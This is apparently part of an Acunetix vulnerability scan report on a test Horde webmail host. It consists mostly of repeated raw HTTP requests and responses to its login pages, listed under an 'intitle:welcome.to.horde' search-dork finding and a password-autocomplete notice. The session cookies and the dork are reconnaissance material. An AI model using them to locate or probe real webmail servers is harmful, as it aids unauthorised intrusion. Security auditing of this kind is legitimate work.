GET /imp/login.php?app=imp&horde_logout_token=rpo9s0fEQvr-PL8-6YEmPmL6eYE&imapuser=vhqsmkqh&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (3a784d3148a695e5246e4f7712293772)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=4IdDEVByjuc3qQ9aCCZa_zV1Ju0&imapuser=lyoxhoba&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Acunetix Website Audit53
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
/imp/login.php (4435f865242a495136a5f5376d63a435)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=pdL5-YjGG7Nh5C6m9jNlmZpORww&imapuser=ivxkbmfl&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (4bff40967d6a993cb33f6ffe4f726c45)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?new_lang=%26%23x202d;Chinese%20(Simplified)%20(%26%23x7b80;%26%23x4f53;%26%23x4e2d;%26%23x6587;) HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Acunetix Website Audit54
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
/imp/login.php (733b34e2771d847f3e677868a914fc27)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=TDQA5rJjyTg4m99KcTR4_kGc2Ck&imapuser=ggqsiwfl&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10395
/imp/login.php (7f2892c38a099a99d15882e6395df8ed)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?new_lang=Dansk HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Acunetix Website Audit55
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:22 GMT
/imp/login.php (81366dbb3a1b19d17070dae7247058f6)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=YOAPl3vWsuqm_TL_FXgl0owpZmM&imapuser=iyeojwka&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (8d2af24adeca98940d4ca72de057c259)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?new_lang=%26%23x202d;Arabic%20(Syria)%20%26%23x202e;(%26%23x0627;%26%23x0644;%26%23x0639;%26%23x0631;%26%23x0628;%26%23x064a;%26%23x0629;) HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Acunetix Website Audit56
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
/imp/login.php (92d3a0adc0d0c42811b54244a0913050)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=81ZHbgsWu6SDUtUtwCSI2FaJ-BE&imapuser=hurcfetk&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10395
/imp/login.php (98144b1b8c67561c22adeba83a43a266)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=py6BVY4d7g6gx0ofFWB1kQ6hRdY&imapuser=sjtjgfnc&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Acunetix Website Audit57
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
/imp/login.php (9b42f8057a8701d8c0448698f0d7a0ff)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?new_lang=Bahasa%20Indonesia HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (a12e6bd4443144c1b8c23ea00c2ffe38)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?new_lang=Catal%26%23xe0; HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Acunetix Website Audit58
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
/imp/login.php (a2ba6948a038d7a3a440afb1fc9eceed)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?new_lang=%26%23x010c;esky HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (b0db092b89360e30820e995c6abbbc83)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=g9u7H-78CHQyg9CQNPHaIUumuT8&imapuser=grwtfvif&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Acunetix Website Audit59
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
/imp/login.php (b3cb8470038a18bddad7a22934963f28)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=UVdJ_qdy2FCjlafyUTTJOJOjkUM&imapuser=tjmxnsfk&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (b6658f01c57b6184aa9e241e81e8115a)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=X15QsD-1zAYbNp-KXZCaCs97Ev4&imapuser=uwbkfapt&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Acunetix Website Audit60
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
/imp/login.php (b80345ac9e258e2e5fc0788690b47d67)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?new_lang=Bosanski HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (eb39b850bb307c9b610a48be2af0d636)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=WpLNAAqx7QwZs-m-mA-TXAsylgU&imapuser=gmbrshlo&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Acunetix Website Audit61
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
/imp/login.php (f9867d029cae700bee7e0e09c3c5e9bc)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?app=imp&horde_logout_token=5HmQhu81IJ8NQd3wg4Xsyucnj7Q&imapuser=lwnnwvll&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (fa2cb8a65862e58974030595118192cb)
Details
We found
intitle:welcome.to.horde
Request
GET /imp/login.php?new_lang=%26%23x202d;Arabic%20(Oman)%20%26%23x202e;(%26%23x0627;%26%23x0644;%26%23x0639;%26%23x0631;%26%23x0628;%26%23x064a;%26%23x0629;) HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Acunetix Website Audit62
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
/imp/redirect.php
Details
We found
intitle:welcome.to.horde
Request
GET /imp/redirect.php HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=cc98ab8bb445fe090d5f7b594f58e208; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:03 GMT
Content-Length: 10193
Password type input with autocomplete enabled
 
SeverityInformational
TypeInformational
Reported by moduleCrawler
Description
When a new name and password is entered in a form and the form is submitted, the browser asks if the password should be saved. Thereafter when the form is displayed, the name and password are filled in automatically or are completed as the name is entered. An attacker with local access could obtain the cleartext password from the browser cache.
Impact
Possible sensitive information disclosure
Recommendation
The password autocomplete should be disabled in sensitive applications.
To disable autocomplete, you may use a code similar to:
<INPUT TYPE="password" AUTOCOMPLETE="off">
Affected items
Acunetix Website Audit63
/imp
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/ HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:11 GMT
Content-Length: 10191
/imp/index.php
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/index.php HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:11 GMT
Content-Length: 10191
/imp/login.php
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Acunetix Website Audit64
Request
GET /imp/login.php HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
Set-Cookie: Horde=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host
Set-Cookie: imp_key=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host
Set-Cookie: auth_key=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:03 GMT
Content-Length: 10312
/imp/login.php (0543eee9a9fc90cdbcebb4184dc0f436)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?app=imp&horde_logout_token=UkHoj_BUzaHgQnp7cwu9IPDGdx0&imapuser=cderdwxu&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
